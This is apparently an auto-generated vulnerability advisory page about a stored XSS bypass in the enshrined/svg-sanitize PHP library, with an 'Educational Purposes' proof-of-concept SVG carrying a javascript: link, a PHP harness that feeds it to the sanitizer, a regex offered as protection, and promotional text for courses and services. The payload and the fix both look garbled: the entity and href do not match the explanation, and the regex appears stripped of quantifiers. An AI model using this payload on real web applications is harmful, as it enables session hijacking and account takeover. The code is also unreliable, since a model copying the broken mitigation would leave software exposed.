Listen to this Post
DailyCVE Form:
Platform: enshrined/svg-sanitize
Version: < 1.0.0
Vulnerability : Stored XSS
Severity: Medium
date: 2026-10-08
Prediction: 2026-10-15
What Undercode Say
A crafted SVG can bypass enshrined/svg-sanitize’s href validation mechanism and successfully deliver a javascript: URL through the filter unchanged. This behavior is driven by a semantic discrepancy between XML entity resolution, which occurs during the sanitization phase, and HTML5 Named Character Reference resolution, which is subsequently performed by the web browser when the resulting SVG markup is rendered inline. Specifically, an attacker defines a DTD entity matching an HTML5 Named Character Reference like a tab character, causing the sanitizer to evaluate the expanded safe fragment while outputting the raw entity reference. When the sanitized SVG file lacks its original DOCTYPE declaration and gets injected inline into an HTML context, the browser resolves the entity back into whitespace characters that are subsequently stripped by the URL parser, enabling arbitrary script execution.
Exploit: (Educational Purposes!)
<!DOCTYPE svg [<!ENTITY Tab "">]> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 120"> <a href=" javascript:alert(document.domain)"> <rect width="400" height="120" fill="c00" rx="12"/> <text x="200" y="65" fill="white" font-size="20" text-anchor="middle">CLICK ME</text> </a> </svg>
require_once 'vendor/autoload.php';
$svg = file_get_contents('xss.svg');
$sanitizer = new \enshrined\svgSanitize\Sanitizer();
$clean = $sanitizer->sanitize($svg);
echo $clean;
Protection: from this CVE
$dirty = preg_replace('/<!DOCTYPE[^>](?:[.?])?\s>/si', '', $dirty);
Impact
Stored cross-site scripting (XSS), session hijacking, document cookie theft, account takeover via admin compromise when rendered inline in web applications.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

